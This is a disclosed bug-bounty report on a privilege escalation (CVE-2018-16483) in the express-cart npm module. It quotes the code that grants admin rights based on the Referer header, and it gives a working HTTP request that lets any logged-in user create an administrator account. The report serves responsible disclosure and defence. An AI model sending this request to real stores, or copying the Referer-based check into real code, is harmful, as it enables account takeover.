# Privilege escalation allows any user to add an administrator

### VULNERABILITY INFORMATION

I would like to report privilege escalation in the npm module express-cart.

It allows a normal user to add another user with administrator privileges.

# Module

**module name:** express-cart
**version:** 1.1.5
**npm page:** `https://www.npmjs.com/package/express-cart`

## Module Description

expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal and Authorize.net payments.

## Module Stats

[10] weekly downloads

# Vulnerability

## Vulnerability Description

A deficiency in the access control allows normal users from expressCart to add new users to the application. This behavior by itself might be considered a privilege escalation. However, it was also possible to add the user as administrator.

## Steps To Reproduce:

Firstly, I noticed that all the endpoints located in the *user.js* file are not being restricted by the *common.restrict* middleware, as the other admin routes do.  Also, the endpoint */admin/user/insert* does not check if the user is admin before adding a new user, which I guess it would be a unlikely behavior.

The following code is used to check if it is the first time creating a user:

```
// set the account to admin if using the setup form. Eg: First user account
let urlParts = url.parse(req.header('Referer'));

let isAdmin = false;
if(urlParts.path === '/admin/setup'){
  isAdmin = true;
}
```

As you can see in the above snippet, if you send a request with a Referer containing the string */admin/setup* the user added will be considered an admin. For example:

```
POST /admin/user/insert HTTP/1.1
Host: localhost:1111
Referer: http://localhost:1111/admin/setup
Content-Type: application/x-www-form-urlencoded
Cookie: connect.sid=[NORMAL_USER_COOKIE]

usersName=NEWADMIN&userEmail=new@admin.com&userPassword=password&frm_userPassword_confirm=password
```

# Wrap up

- I contacted the maintainer to let them know: [N] 
- I opened an issue in the related repository: [N]

## Impact

This vulnerability would allow any registered user to create another user with administrator privileges and takeover the application.

---

| Field | Value |
|-------|-------|
| **Report ID** | #343626 |
| **Title** | Privilege escalation allows any user to add an administrator |
| **URL** | https://hackerone.com/reports/343626 |
| **State** | Resolved |
| **Severity** | Critical (9.9) |
| **Weakness** | Privilege Escalation |
| **CVE IDs** | CVE-2018-16483 |
| **Program** | Node.js third-party modules |
| **Reporter** | patrickrbc |
| **Submitted** | April 26, 2018, 8:55PM UTC |
| **Disclosed** | July 12, 2018, 7:57AM UTC |
| **Visibility** | full |
| **Bounty** | None |

### CVSS METRICS

- **Attack Vector**: network
- **Attack Complexity**: low
- **Privileges Required**: low
- **User Interaction**: none
- **Scope**: changed
- **Confidentiality**: high
- **Integrity**: high
- **Availability**: high

--- *Downloaded from https://hackerone.com/reports/343626*